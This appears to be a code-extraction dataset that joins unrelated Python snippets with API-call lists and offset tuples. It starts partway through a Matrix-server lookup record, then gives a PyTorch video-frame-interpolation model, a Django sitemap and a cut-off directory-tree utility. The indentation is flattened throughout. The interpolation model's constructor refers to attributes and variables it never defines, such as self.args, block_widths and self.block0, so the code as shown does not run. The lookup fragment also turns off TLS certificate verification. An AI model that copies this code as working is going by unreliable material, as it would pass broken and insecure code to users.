'((([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\\\\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])))'\n    )\n", (4153, 4830), False, 'import re\n'), ((5812, 5823), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (5821, 5823), False, 'from fake_useragent import UserAgent\n'), ((5953, 6020), 'urllib3.disable_warnings', 'urllib3.disable_warnings', (['urllib3.exceptions.InsecureRequestWarning'], {}), '(urllib3.exceptions.InsecureRequestWarning)\n', (5977, 6020), False, 'import urllib3\n'), ((8632, 8643), 'fake_useragent.UserAgent', 'UserAgent', ([], {}), '()\n', (8641, 8643), False, 'from fake_useragent import UserAgent\n'), ((10972, 11012), 'socket.gethostbyname', 'socket.gethostbyname', (['delegated_hostname'], {}), '(delegated_hostname)\n', (10992, 11012), False, 'import socket\n'), ((1034, 1131), 'requests.get', 'requests.get', (['well_known_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(3)'}), '(well_known_url, headers=headers, allow_redirects=True, verify=\n    False, timeout=3)\n', (1046, 1131), False, 'import requests\n'), ((2949, 2992), 'srvlookup.lookup', 'srvlookup.lookup', (['"""matrix"""', '"""TCP"""', 'hostname'], {}), "('matrix', 'TCP', hostname)\n", (2965, 2992), False, 'import srvlookup\n'), ((6053, 6138), 'requests.get', 'requests.get', (['url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(1)'}), '(url, headers=headers, allow_redirects=True, verify=False,\n    timeout=1)\n', (6065, 6138), False, 'import requests\n'), ((8894, 8969), 'requests.get', 'requests.get', (['version_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'timeout': '(3)'}), '(version_url, headers=headers, allow_redirects=True, timeout=3)\n', (8906, 8969), False, 'import requests\n'), ((2810, 2840), 'logging.getLogger', 'logging.getLogger', (['"""srvlookup"""'], {}), "('srvlookup')\n", (2827, 2840), False, 'import logging\n'), ((9124, 9218), 'requests.get', 'requests.get', (['version_url'], {'headers': 'headers', 'allow_redirects': '(True)', 'verify': '(False)', 'timeout': '(3)'}), '(version_url, headers=headers, allow_redirects=True, verify=\n    False, timeout=3)\n', (9136, 9218), False, 'import requests\n')]
|
import os
import functools
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed as dist
from model.warp import backwarp, multiwarp, multimerge_flow
from model.refine import *
from model.setrans import SETransConfig, SelfAttVisPosTrans, print0
from model.forward_warp import fwarp_blob, fwarp_imgs
from model.losses import dual_teaching_loss
from model.raft.update import BasicUpdateBlock
from model.raft.extractor import BasicEncoder
from model.raft.corr import CorrBlock
local_rank = int(os.environ.get('LOCAL_RANK', 0))
try:
autocast = torch.cuda.amp.autocast
except AttributeError:
# dummy autocast for PyTorch < 1.6
class autocast:
def __init__(self, enabled):
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
def debug():
if local_rank == 0:
breakpoint()
else:
dist.barrier()
# https://discuss.pytorch.org/t/exluding-torch-clamp-from-backpropagation-as-tf-stop-gradient-in-tensorflow/52404/2
class Clamp01(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input.clamp(min=0, max=1)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
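# Illustrative sketch (not part of the original source): Clamp01 behaves as a
# straight-through estimator -- the forward pass clamps to [0, 1], but the
# backward pass lets the gradient through unchanged, unlike torch.clamp whose
# gradient is zero outside the clamped range:
#   x = torch.tensor([1.5], requires_grad=True)
#   Clamp01.apply(x).backward()   # x.grad == tensor([1.]); torch.clamp would give 0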
# Incorporate SOFI into RIFE.
# SOFI: Self-supervised optical flow through video frame interpolation.
class IFNet_RAFT(nn.Module):
def __init__(self, multi=(8,8,4), is_big_model=False, esti_sofi=False, num_sofi_loops=2):
        super(IFNet_RAFT, self).__init__()
        # self.Ms holds the multi-flow group count per scale (inferred from how self.Ms[i] is used below).
        self.Ms = multi
        self.hidden_dim = hdim = 128
        self.context_dim = cdim = 128
        self.corr_levels = 4
        self.corr_radius = 4
        print("RAFT lookup radius: %d" % self.corr_radius)
if 'dropout' not in self.args:
self.args.dropout = 0
# feature network, context network, and update block
self.fnet = BasicEncoder(output_dim=256, norm_fn='instance', dropout=0)
self.cnet = BasicEncoder(output_dim=hdim+cdim, norm_fn='batch', dropout=0)
self.update_block = BasicUpdateBlock(self.args, hidden_dim=hdim)
# unet: 17 channels of input, 3 channels of output. Output is between 0 and 1.
self.unet = Unet()
self.esti_sofi = esti_sofi
if self.esti_sofi:
# nonimg_chans: 2 global mask scores (1 for each direction), 4 flow (2 for each direction).
self.block_sofi = IFBlock('block_sofi', c=block_widths[2], img_chans=6, nonimg_chans=6,
multi=self.Ms[2], global_mask_chans=2)
self.sofi_unet0 = SOFI_Unet()
self.sofi_unet1 = SOFI_Unet()
self.stopgrad_prob = 0
self.num_sofi_loops = num_sofi_loops
self.cut_sofi_loop_grad = False
else:
self.num_sofi_loops = 0
# Clamp with gradient works worse. Maybe when a value is clamped, that means it's an outlier?
self.use_clamp_with_grad = False
if self.use_clamp_with_grad:
            self.clamp = Clamp01.apply
else:
self.clamp = functools.partial(torch.clamp, min=0, max=1)
# scale_list: the scales to shrink the feature maps. scale_factor = 1. / scale_list[i]
# For evaluation on benchmark datasets, as only the middle frame is compared,
# we don't need to consider a flexible timestep here.
    def forward(self, imgs, mid_gt, scale_list=(4, 2, 1), timestep=0.5):
img0 = imgs[:, :3]
img1 = imgs[:, 3:6]
# During inference, mid_gt is an empty tensor.
# If mid_gt is provided (in the training stage), then do distillation.
do_distillation = (mid_gt.shape[1] == 3)
img0_warped, img1_warped = None, None
stu_blocks = [self.block0, self.block1, self.block2]
loss_distill = 0
NS = len(scale_list)
# 3 scales of interpolation flow.
flow_list = [ None for _ in range(NS) ]
# 2 loops of sofi flow.
sofi_flow_list = [ None for _ in range(self.num_sofi_loops) ]
# 3 scales of backwarped middle frame (each scale has two images: warped img0 / img1).
warped_imgs_list = [ None for _ in range(NS) ]
mask_list = [ None for _ in range(NS) ]
# 3 scales of crude middle frame (merged from images warped in two directions) + warped img0 + warped img1.
crude_img_list = [ None for _ in range(NS + 2) ]
# 3 scales of estimated middle frame + reconstructed img0 + reconstructed img1
refined_img_list = [ None for _ in range(NS + 2) ]
for i in range(NS):
if i == 0:
imgs = torch.cat((img0, img1), 1)
global_mask_score = torch.zeros_like(img0[:, [0]])
flow_shape = list(img0.shape)
flow_shape[1] = 4
flow = torch.zeros(flow_shape, device=img0.device)
# flow = None
else:
# scale_list[i]: 1/4, 1/2, 1, i.e., from coarse to fine grained, and from smaller to larger images.
imgs = torch.cat((img0, img0_warped, img1, img1_warped), 1)
# flow: merged flow from multiflow of the previous iteration.
# multiflow_d: delta multiflow.
# multimask_score_d: score for delta multiflow (not delta score; score has no skip connection.)
# multiflow, multiflow_d: [16, 4*M, 224, 224]
# multimask_score, multimask_score_d: [16, 2*M+1, 224, 224]
# multiflow, multimask_score returned from an IFBlock is always of the size of the original image.
multiflow_d, multimask_score_d = stu_blocks[i](imgs, global_mask_score, flow, scale=scale_list[i])
if i == 0:
multiflow_skip = 0
else:
Mp = self.Ms[i-1]
Mc = self.Ms[i]
if Mp == Mc:
multiflow_skip = multiflow
elif Mp > Mc:
# Mp: M of the previous iteration. Mc: M of the current iteration.
# If multiflow from the previous iteration has more channels than the current iteration,
# only take the first Ms[i] channels (of each direction) as the residual.
multiflow_skip = torch.cat([ multiflow[:, :2*Mc], multiflow[:, 2*Mp:2*Mp+2*Mc] ], 1)
# Mp < Mc should never happen.
else:
debug()
multiflow = multiflow_skip + multiflow_d
# multimask_score of different layers have little correlations.
# No need to have residual connections.
multimask_score = multimask_score_d
global_mask_score = multimask_score[:, [-1]]
mask_list[i] = torch.sigmoid(global_mask_score)
# flow: single bi-flow merged from multiflow.
flow = multimerge_flow(multiflow, multimask_score, self.Ms[i])
flow_list[i] = flow
img0_warped, img1_warped = \
multiwarp(img0, img1, multiflow, multimask_score, self.Ms[i])
warped_imgs = (img0_warped, img1_warped)
warped_imgs_list[i] = warped_imgs
if do_distillation:
# multiflow and multimask_score are from block2,
# which always have the same M as the teacher.
multiflow_skip = multiflow
# teacher only works at the last scale, i.e., the full image.
# block_tea ~ block2, except that block_tea takes mid_gt (the middle frame) as extra input.
# block_tea input: torch.cat: [1, 13, 256, 448], flow: [1, 4, 256, 448].
# multiflow_d / multimask_score_d: flow / mask score difference
# between the teacher and the student (or residual of the teacher).
# The teacher only predicts the residual.
imgs = torch.cat((img0, img0_warped, img1, img1_warped), 1)
nonimg = torch.cat((global_mask_score, mid_gt), 1)
multiflow_tea_d, multimask_score_tea = self.block_tea(imgs, nonimg, flow, scale=1)
# Removing this residual connection makes the teacher perform much worse.
multiflow_tea = multiflow_skip + multiflow_tea_d
img0_warped_tea, img1_warped_tea = \
multiwarp(img0, img1, multiflow_tea, multimask_score_tea, self.Ms[NS-1])
global_mask_score_tea = multimask_score_tea[:, [-1]]
mask_tea = torch.sigmoid(global_mask_score_tea)
merged_tea = img0_warped_tea * mask_tea + img1_warped_tea * (1 - mask_tea)
flow_tea = multimerge_flow(multiflow_tea, multimask_score_tea, self.Ms[NS-1])
else:
flow_tea = None
merged_tea = None
for i in range(NS):
# mask_list[i]: *soft* mask (weights) at the i-th scale.
# crude_img_list[i]: average of 0.5->0 and 0.5->1 warped images.
crude_img_list[i] = warped_imgs_list[i][0] * mask_list[i] + \
warped_imgs_list[i][1] * (1 - mask_list[i])
if do_distillation:
# dual_teaching_loss: the student can also teach the teacher,
# when the student is more accurate.
# Distilling both merged flow and global mask score leads to slightly worse performance.
loss_distill += dual_teaching_loss(mid_gt,
crude_img_list[i], flow_list[i],
merged_tea, flow_tea,
)
M = self.Ms[-1]
# multiflow_m0, multiflow_m1: first/second half of multiflow.
# multimask_score_m0, multimask_score_m1: first/second half of multimask_score (except the global score).
multiflow_m0, multiflow_m1 = multiflow[:, :2*M], multiflow[:, 2*M:4*M]
multimask_score_m0, multimask_score_m1 = multimask_score[:, :M], multimask_score[:, M:2*M]
# Using dual warp reduces performance slightly.
sofi_do_dual_warp = False
if self.esti_sofi:
multiflow01_sofi, flow01, multimask_score01_sofi, global_mask_score01_sofi, \
multiflow10_sofi, flow10, multimask_score10_sofi, global_mask_score10_sofi \
= fwarp_blob(flow, multiflow, multimask_score, M)
multiflow_sofi = torch.cat([multiflow10_sofi, multiflow01_sofi], 1)
global_mask_score_sofi = torch.cat([global_mask_score10_sofi, global_mask_score01_sofi], 1)
# multimask_score_sofi is appended with global_mask_score_sofi,
# but note global_mask_score_sofi is bidirectional (2 channels).
# i.e., global_mask_score forward-warped to img0/img1, respectively.
# multimask_score_sofi here is only used in multimerge_flow(), where the global_mask_score_sofi is not used.
# They are concatenated to multimask_score_sofi just to have a consistent channel number with later loops,
# so as to pass the sanity check in multiwarp().
multimask_score_sofi = torch.cat([multimask_score10_sofi, multimask_score01_sofi, global_mask_score_sofi], 1)
flow_sofi = multimerge_flow(multiflow_sofi, multimask_score_sofi, M)
img0_bwarp_sofi, img1_bwarp_sofi = \
multiwarp(img0, img1, multiflow_sofi, multimask_score_sofi, M)
if sofi_do_dual_warp:
# img0_fw1 is img0 forward-warped by flow01, to approximate img1.
# img1_fw0 is img1 forward-warped by flow10, to approximate img0.
img0_fw1, img1_fw0 = fwarp_imgs(img0, img1, flow_sofi)
# img0_bwarp_sofi is img0 backward-warped by flow10, to approximate img1.
# both img0_fw1 and img0_bwarp_sofi are to approximate img1.
# Generate dual-warped images. No weights are available at the beginning,
# so assign a weight according to the intuition that backwarped images are usually better.
img0_warp = (img0_bwarp_sofi * 2 + img0_fw1) / 3
# img1_bwarp_sofi is img1 backward-warped by flow01, to approximate img0.
# img1_fw0 is img1 forward-warped by flow10, to approximate img0.
img1_warp = (img1_bwarp_sofi * 2 + img1_fw0) / 3
else:
img0_warp = img0_bwarp_sofi
img1_warp = img1_bwarp_sofi
for k in range(self.num_sofi_loops):
imgs = torch.cat((img0, img0_warp, img1, img1_warp), 1)
# multiflow_sofi_d: flow delta between the new multiflow_sofi and the old multiflow_sofi.
# the last two channels of multimask_score_sofi are global mask weights to indicate occlusions.
# So they are passed to sofi_unet().
multiflow_sofi_d, multimask_score_sofi = self.block_sofi(imgs, global_mask_score_sofi, flow_sofi, scale=scale_list[0])
# multiflow_sofi: refined flow (1->0, 0->1).
# In the first loop, stopgrad helps during early stages, but hurts during later stages,
# even if it's activated with a small probability like 0.3.
# So it's disabled by initializing stopgrad_prob=0.
# If cut_sofi_loop_grad, then in later loops (k>0), the gradient flow will be cut from the previously estimated flow.
# cut_sofi_loop_grad=True hurts performance, so disabled.
if k == 0 and (self.stopgrad_prob > 0 and torch.rand(1) < self.stopgrad_prob) \
or (k > 0 and self.cut_sofi_loop_grad):
multiflow_sofi = multiflow_sofi_d + multiflow_sofi.detach()
else:
multiflow_sofi = multiflow_sofi_d + multiflow_sofi
flow_sofi = multimerge_flow(multiflow_sofi, multimask_score_sofi, M)
sofi_flow_list[k] = flow_sofi
# The last two channels of multimask_score_sofi is unconstrained,
# which may pose some issues when used as input feature to block_sofi.
global_mask_score_sofi = multimask_score_sofi[:, -2:]
img0_bwarp_sofi, img1_bwarp_sofi = multiwarp(img0, img1, multiflow_sofi, multimask_score_sofi, M)
if sofi_do_dual_warp:
img0_fw1, img1_fw0 = fwarp_imgs(img0, img1, flow_sofi)
mask_sofi = torch.sigmoid(global_mask_score_sofi)
img0_warp = img0_bwarp_sofi * mask_sofi[:, [0]] + img0_fw1 * (1 - mask_sofi[:, [0]])
img1_warp = img1_bwarp_sofi * mask_sofi[:, [1]] + img1_fw0 * (1 - mask_sofi[:, [1]])
else:
img0_warp = img0_bwarp_sofi
img1_warp = img1_bwarp_sofi
multiflow10_sofi, multiflow01_sofi = multiflow_sofi[:, :2*M], multiflow_sofi[:, 2*M:4*M]
multimask_score10_sofi, multimask_score01_sofi = multimask_score_sofi[:, :M], multimask_score_sofi[:, M:2*M]
# flow_sofi: single bi-flow merged from multiflow_sofi.
else:
multiflow_sofi, multiflow10_sofi, multiflow01_sofi = None, None, None
multimask_score_sofi, multimask_score10_sofi, multimask_score01_sofi = None, None, None
# contextnet generates backwarped features of the input image.
# multimask_score* is used in multiwarp, i.e., first backwarp features according to multiflow*,
# then combine with multimask_score*.
# ctx0, ctx1: four level conv features of img0 and img1, gradually scaled down.
# If esti_sofi: ctx0_sofi, ctx1_sofi are contextual features backwarped
# by multiflow10_sofi and multiflow01_sofi, respectively.
# Otherwise, multiflow10_sofi, multimask_score10_sofi are None,
# and accordingly, ctx0_sofi, ctx1_sofi are None.
ctx0, ctx0_sofi = self.contextnet(img0, M, multiflow_m0, multimask_score_m0,
multiflow10_sofi, multimask_score10_sofi)
ctx1, ctx1_sofi = self.contextnet(img1, M, multiflow_m1, multimask_score_m1,
multiflow01_sofi, multimask_score01_sofi)
# After backwarping, ctx0/ctx1 are both aligned with the middle frame.
# After backwarping, ctx0_sofi is aligned with img1, and ctx1_sofi aligned with img0.
# unet is to refine the crude image crude_img_list[NS-1] with its output img_residual.
# flow: merged flow (of two directions) from multiflow computed in the last iteration.
img_residual = self.unet(img0, img1, img0_warped, img1_warped, global_mask_score, flow, ctx0, ctx1)
# unet activation function changes from softmax to tanh. No need to scale anymore.
refined_img = self.clamp(crude_img_list[NS - 1] + img_residual)
# refined_img_list[0~1] are always None, to make the indices consistent with crude_img_list.
refined_img_list[NS - 1] = refined_img
if self.esti_sofi:
# img0_warp is a crude version of img1, and is refined with img1_residual.
# img1_warp is a crude version of img0, and is refined with img0_residual.
flow10, flow01 = flow_sofi.split(2, dim=1)
global_mask_score10_sofi, global_mask_score01_sofi = global_mask_score_sofi.split(1, dim=1)
# flow01_align1: flow01 aligned to image1.
flow01_align1 = backwarp(flow01, flow10)
# flow10_align0: flow10 aligned to image0.
flow10_align0 = backwarp(flow10, flow01)
flow_sofi_align1 = torch.cat((flow10, flow01_align1), dim=1)
flow_sofi_align0 = torch.cat((flow10_align0, flow01), dim=1)
# flow_sofi extended with flow01 aligned to image1.
# flow_sofi_01a1 = torch.cat((flow_sofi, flow01_align1), dim=1)
# flow_sofi extended with flow10 aligned to image0.
# flow_sofi_10a0 = torch.cat((flow_sofi, flow10_align0), dim=1)
# flow_sofi_warp = torch.cat((flow_sofi, flow10_align0, flow01_align1), dim=1)
# After backwarping in contextnet(), ctx1_sofi is aligned with img0, and ctx0_sofi is aligned with img1.
# For img0_residual, try the best to align all input features with img0.
img0_residual = self.sofi_unet0(img1, img1_warp, global_mask_score01_sofi, flow_sofi_align0, ctx1_sofi)
# For img1_residual, try the best to align all input features with img1.
img1_residual = self.sofi_unet1(img0, img0_warp, global_mask_score10_sofi, flow_sofi_align1, ctx0_sofi)
# The order in crude_img_list and refined_img_list: img 0, img 1.
# img1_warp is to approximate img0, so it appears first.
crude_img_list[NS] = img1_warp
refined_img0 = self.clamp(img1_warp + img0_residual)
refined_img_list[NS] = refined_img0
            # warped img0 approximates img1.
crude_img_list[NS+1] = img0_warp
refined_img1 = self.clamp(img0_warp + img1_residual)
refined_img_list[NS + 1] = refined_img1
teacher_dict = { 'flow_teacher': flow_tea, 'merged_teacher': merged_tea }
# flow_list, mask_list: flow and mask in NS=3 different scales.
# If mid_gt is None, loss_distill = 0.
return flow_list, sofi_flow_list, mask_list[-1], crude_img_list, refined_img_list, teacher_dict, loss_distill
|
[
"functools.partial",
"model.losses.dual_teaching_loss",
"model.raft.update.BasicUpdateBlock",
"model.forward_warp.fwarp_blob",
"model.warp.multiwarp",
"torch.zeros_like",
"model.raft.extractor.BasicEncoder",
"torch.distributed.barrier",
"torch.cat",
"model.warp.backwarp",
"torch.zeros",
"os.environ.get",
"torch.sigmoid",
"model.forward_warp.fwarp_imgs",
"torch.rand",
"model.warp.multimerge_flow"
] |
[((530, 561), 'os.environ.get', 'os.environ.get', (['"""LOCAL_RANK"""', '(0)'], {}), "('LOCAL_RANK', 0)\n", (544, 561), False, 'import os\n'), ((904, 918), 'torch.distributed.barrier', 'dist.barrier', ([], {}), '()\n', (916, 918), True, 'import torch.distributed as dist\n'), ((1875, 1934), 'model.raft.extractor.BasicEncoder', 'BasicEncoder', ([], {'output_dim': '(256)', 'norm_fn': '"""instance"""', 'dropout': '(0)'}), "(output_dim=256, norm_fn='instance', dropout=0)\n", (1887, 1934), False, 'from model.raft.extractor import BasicEncoder\n'), ((1963, 2027), 'model.raft.extractor.BasicEncoder', 'BasicEncoder', ([], {'output_dim': '(hdim + cdim)', 'norm_fn': '"""batch"""', 'dropout': '(0)'}), "(output_dim=hdim + cdim, norm_fn='batch', dropout=0)\n", (1975, 2027), False, 'from model.raft.extractor import BasicEncoder\n'), ((2054, 2098), 'model.raft.update.BasicUpdateBlock', 'BasicUpdateBlock', (['self.args'], {'hidden_dim': 'hdim'}), '(self.args, hidden_dim=hdim)\n', (2070, 2098), False, 'from model.raft.update import BasicUpdateBlock\n'), ((3120, 3164), 'functools.partial', 'functools.partial', (['torch.clamp'], {'min': '(0)', 'max': '(1)'}), '(torch.clamp, min=0, max=1)\n', (3137, 3164), False, 'import functools\n'), ((6821, 6853), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score'], {}), '(global_mask_score)\n', (6834, 6853), False, 'import torch\n'), ((6932, 6987), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow', 'multimask_score', 'self.Ms[i]'], {}), '(multiflow, multimask_score, self.Ms[i])\n', (6947, 6987), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((7077, 7138), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow', 'multimask_score', 'self.Ms[i]'], {}), '(img0, img1, multiflow, multimask_score, self.Ms[i])\n', (7086, 7138), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((7925, 7977), 'torch.cat', 'torch.cat', (['(img0, img0_warped, img1, img1_warped)', '(1)'], {}), '((img0, img0_warped, img1, img1_warped), 1)\n', (7934, 7977), False, 'import torch\n'), ((7999, 8040), 'torch.cat', 'torch.cat', (['(global_mask_score, mid_gt)', '(1)'], {}), '((global_mask_score, mid_gt), 1)\n', (8008, 8040), False, 'import torch\n'), ((8371, 8445), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_tea', 'multimask_score_tea', 'self.Ms[NS - 1]'], {}), '(img0, img1, multiflow_tea, multimask_score_tea, self.Ms[NS - 1])\n', (8380, 8445), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((8532, 8568), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score_tea'], {}), '(global_mask_score_tea)\n', (8545, 8568), False, 'import torch\n'), ((8679, 8747), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_tea', 'multimask_score_tea', 'self.Ms[NS - 1]'], {}), '(multiflow_tea, multimask_score_tea, self.Ms[NS - 1])\n', (8694, 8747), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((10450, 10497), 'model.forward_warp.fwarp_blob', 'fwarp_blob', (['flow', 'multiflow', 'multimask_score', 'M'], {}), '(flow, multiflow, multimask_score, M)\n', (10460, 10497), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((10537, 10587), 'torch.cat', 'torch.cat', (['[multiflow10_sofi, multiflow01_sofi]', '(1)'], {}), '([multiflow10_sofi, multiflow01_sofi], 1)\n', (10546, 10587), False, 'import torch\n'), ((10635, 10701), 'torch.cat', 'torch.cat', (['[global_mask_score10_sofi, global_mask_score01_sofi]', '(1)'], {}), '([global_mask_score10_sofi, global_mask_score01_sofi], 1)\n', (10644, 10701), False, 'import torch\n'), ((11276, 11366), 'torch.cat', 'torch.cat', (['[multimask_score10_sofi, multimask_score01_sofi, global_mask_score_sofi]', '(1)'], {}), '([multimask_score10_sofi, multimask_score01_sofi,\n    global_mask_score_sofi], 1)\n', (11285, 11366), False, 'import torch\n'), ((11401, 11457), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(multiflow_sofi, multimask_score_sofi, M)\n', (11416, 11457), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((11523, 11585), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(img0, img1, multiflow_sofi, multimask_score_sofi, M)\n', (11532, 11585), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17733, 17757), 'model.warp.backwarp', 'backwarp', (['flow01', 'flow10'], {}), '(flow01, flow10)\n', (17741, 17757), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17841, 17865), 'model.warp.backwarp', 'backwarp', (['flow10', 'flow01'], {}), '(flow10, flow01)\n', (17849, 17865), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((17897, 17938), 'torch.cat', 'torch.cat', (['(flow10, flow01_align1)'], {'dim': '(1)'}), '((flow10, flow01_align1), dim=1)\n', (17906, 17938), False, 'import torch\n'), ((17970, 18011), 'torch.cat', 'torch.cat', (['(flow10_align0, flow01)'], {'dim': '(1)'}), '((flow10_align0, flow01), dim=1)\n', (17979, 18011), False, 'import torch\n'), ((4683, 4709), 'torch.cat', 'torch.cat', (['(img0, img1)', '(1)'], {}), '((img0, img1), 1)\n', (4692, 4709), False, 'import torch\n'), ((4746, 4776), 'torch.zeros_like', 'torch.zeros_like', (['img0[:, [0]]'], {}), '(img0[:, [0]])\n', (4762, 4776), False, 'import torch\n'), ((4880, 4923), 'torch.zeros', 'torch.zeros', (['flow_shape'], {'device': 'img0.device'}), '(flow_shape, device=img0.device)\n', (4891, 4923), False, 'import torch\n'), ((5111, 5163), 'torch.cat', 'torch.cat', (['(img0, img0_warped, img1, img1_warped)', '(1)'], {}), '((img0, img0_warped, img1, img1_warped), 1)\n', (5120, 5163), False, 'import torch\n'), ((9479, 9564), 'model.losses.dual_teaching_loss', 'dual_teaching_loss', (['mid_gt', 'crude_img_list[i]', 'flow_list[i]', 'merged_tea', 'flow_tea'], {}), '(mid_gt, crude_img_list[i], flow_list[i], merged_tea,\n    flow_tea)\n', (9497, 9564), False, 'from model.losses import dual_teaching_loss\n'), ((11822, 11855), 'model.forward_warp.fwarp_imgs', 'fwarp_imgs', (['img0', 'img1', 'flow_sofi'], {}), '(img0, img1, flow_sofi)\n', (11832, 11855), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((12702, 12750), 'torch.cat', 'torch.cat', (['(img0, img0_warp, img1, img1_warp)', '(1)'], {}), '((img0, img0_warp, img1, img1_warp), 1)\n', (12711, 12750), False, 'import torch\n'), ((14030, 14086), 'model.warp.multimerge_flow', 'multimerge_flow', (['multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(multiflow_sofi, multimask_score_sofi, M)\n', (14045, 14086), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((14426, 14488), 'model.warp.multiwarp', 'multiwarp', (['img0', 'img1', 'multiflow_sofi', 'multimask_score_sofi', 'M'], {}), '(img0, img1, multiflow_sofi, multimask_score_sofi, M)\n', (14435, 14488), False, 'from model.warp import backwarp, multiwarp, multimerge_flow\n'), ((14569, 14602), 'model.forward_warp.fwarp_imgs', 'fwarp_imgs', (['img0', 'img1', 'flow_sofi'], {}), '(img0, img1, flow_sofi)\n', (14579, 14602), False, 'from model.forward_warp import fwarp_blob, fwarp_imgs\n'), ((14635, 14672), 'torch.sigmoid', 'torch.sigmoid', (['global_mask_score_sofi'], {}), '(global_mask_score_sofi)\n', (14648, 14672), False, 'import torch\n'), ((6335, 6410), 'torch.cat', 'torch.cat', (['[multiflow[:, :2 * Mc], multiflow[:, 2 * Mp:2 * Mp + 2 * Mc]]', '(1)'], {}), '([multiflow[:, :2 * Mc], multiflow[:, 2 * Mp:2 * Mp + 2 * Mc]], 1)\n', (6344, 6410), False, 'import torch\n'), ((13733, 13746), 'torch.rand', 'torch.rand', (['(1)'], {}), '(1)\n', (13743, 13746), False, 'import torch\n')]
|
from django.contrib.sitemaps import Sitemap
from django.shortcuts import reverse
from .models import Article
class StaticViewSitemap(Sitemap):
def items(self):
return ["home", "articles"]
def location(self, item):
return reverse(item)
class ArticleSitemap(Sitemap):
def items(self):
return Article.objects.all()
def lastmod(self, obj):
return obj.created_on
|
[
"django.shortcuts.reverse"
] |
[((249, 262), 'django.shortcuts.reverse', 'reverse', (['item'], {}), '(item)\n', (256, 262), False, 'from django.shortcuts import reverse\n')]
|
from efdir import fs
from efdir import rstcfg
from efdir import jsoncfg
import os
#dlmktree mktree-from-dirs
#fmktree mktree-from-filecfg
def _cfgfile2pl(cfgfile):
suffix = os.path.splitext(cfgfile)[1]
if(suffix == ".rst"):
rst_str = fs.rfile(cfgfile)
dirs = rstcfg.get_dirs(rst_str)
elif(suffix == ".json"):
d = fs.rjson(cfgfile)
dirs = jsoncfg.get_dirs(d)
    else:
        print("error, must be .rst or .json")
        dirs = []
    return(dirs)
def _cfg2pl(cfg):
if(isinstance(cfg,str)):
dirs = rstcfg.get_dirs(cfg)
elif(isinstance(cfg,dict)):
dirs = jsoncfg.get_dirs(cfg)
    else:
        print("error, must be .rst or .json")
        dirs = []
    return(dirs)
def _creat_dir(dir,parent_dir,**kwargs):
if(os.path.exists(parent_dir)):
if(os.path.isdir(parent_dir)):
pass
else:
print(parent_dir+"exists,but is not a dir!!!")
else:
fs.mkdirs(parent_dir,**kwargs)
dirname = os.path.dirname(dir)
basename = os.path.basename(dir)
tail = basename[-1]
if(tail == "$"):
full = os.path.join(parent_dir,dirname,basename[:-1])
fs.mkdirs(os.path.join(parent_dir,dirname),**kwargs)
fs.touch(full)
else:
fs.mkdirs(os.path.join(parent_dir,dir),**kwargs)
def _dlmktree(dirs,parent_dir="./",**kwargs):
for i in range(dirs.__len__()):
_creat_dir(dirs[i],parent_dir,**kwargs)
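# Illustrative usage sketch (not part of the original source): a trailing "$"
# marks an entry as a file to touch rather than a directory to create, e.g.
#   _dlmktree(["a/b", "a/c/readme.md$"])   # makes dirs a/b and a/c, touches a/c/readme.md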
def mktree(cfg,parent_dir="./",**kwargs):
dirs = _cfg2pl(cfg)
_dlmktree(dirs,parent_dir,**kwargs)
def fmktree(cfgfile,parent_dir="./",**kwargs):
dirs = _cfgfile2pl(cfgfile)
_dlmktree(dirs,parent_dir,**kwargs)
|
[
"efdir.jsoncfg.get_dirs",
"os.path.join",
"os.path.basename",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"efdir.fs.rjson",
"efdir.rstcfg.get_dirs",
"efdir.fs.touch",
"os.path.splitext",
